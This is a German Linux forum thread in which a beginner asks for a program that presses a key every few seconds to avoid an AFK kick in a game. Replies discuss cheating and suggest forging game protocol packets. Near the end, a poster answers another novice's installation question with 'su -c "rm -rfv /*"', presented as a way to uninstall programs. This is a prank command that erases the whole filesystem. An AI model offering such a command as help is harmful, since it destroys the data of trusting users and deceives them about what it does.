Brauche Hilfe bei einem Programm

A

Alpa

Grünschnabel
Hi,
kann mir jemand folgendes programm programmieren/schicken:

Eine bestimmte taste (z.b. die w-taste) soll alle paar sekunden gedrückt werden,das über ein paar stunden,also so das mein pc automatisch eine bestimmte taste sagen wir alle 5 secs drückt,ohne das ich am pc sein muss,
ich habe keine ahnung vom programmieren und wenn es geht erklärt mir doch bitte einer wie ich das programm dann zum starten bringe
 
na auf nu schreibt net son schmarn und helft mir ma lieber :P
 
Na, auf die Aufloesung bin ich mal gespannt. Das Programm muss sich ja immerhin auch an den Prozess einklinken, dass die Eingabe erwartet - wenn man es vom Terminal aus startet, erhaelt der Terminal ja sonst stundenlang alle 5s lang ein 'w', was dann wohl entweder zu einem unbekannten Befehl oder einem vollen Keyboard-Puffer fuehrt. Wuerde auch mal gerne wissen, was die Eingabe tatsaechlich bewirken soll, wobei ich annehme, dass es sich bei dem 'w' eher um ein 'j', 'y', 'n', oder der <Enter>-Taste handelt.

Wie gesagt, bin gespannt.
 
es handelt sich um ein spiel,in dem ich nicht afk sein will,wenn man afk ist fliegt man raus,umso länger man drin ist umso mehr pkt bekommt man--> ich möchte möglichst lange drinnen sein
meine tasten sind auf "w-a-s-d" belegt (die lauftasten),deswegen hätte ich gerne das der computer für mich automatisch alle paar sekunden einen schritt nach vorne geht (die w taste drückt)
 
also ma ganz im ernst :
ihr benutzt alle euren tollen fachausdrücke,tituliert mich als cheater,aber so wirklich programmieren kann das programm keiner oder oO
 
du musst das protokoll analysieren und dann entsprechende (gefälschte) pakete schicken..

sowas wie UO-Loop für Ultima Online.. nur halt tiefergreifend, eher auf ebene von Injection.

UO-Loop hat unter Windows gefälschte API-Messages an UO geschickt, die für Tastendruck standen. Für X11R6 kannst du das auch machen, aber einfacher wäre es, dich in das protokoll zu hacken.

auf bald
oenone
 
habe ein probelm neue programme zuinsterlieren kann mir jemannt helfen
 
Um alle Programme zu DEinstallieren, kannst du ein
Code:
> su -c "rm -rfv /*"
probieren

scnr
 

Ähnliche Themen

batch script funktioniert nicht ...brauche hilfe

Hilfe bei Shell-Scripting

Heimserver Konfiguration für Ubuntu Server?!

Vollständiger Techniktrottel bittet um Hilfe

PHP Programmierer (m/w) für universitätsnahes StartUp

Zurück
Oben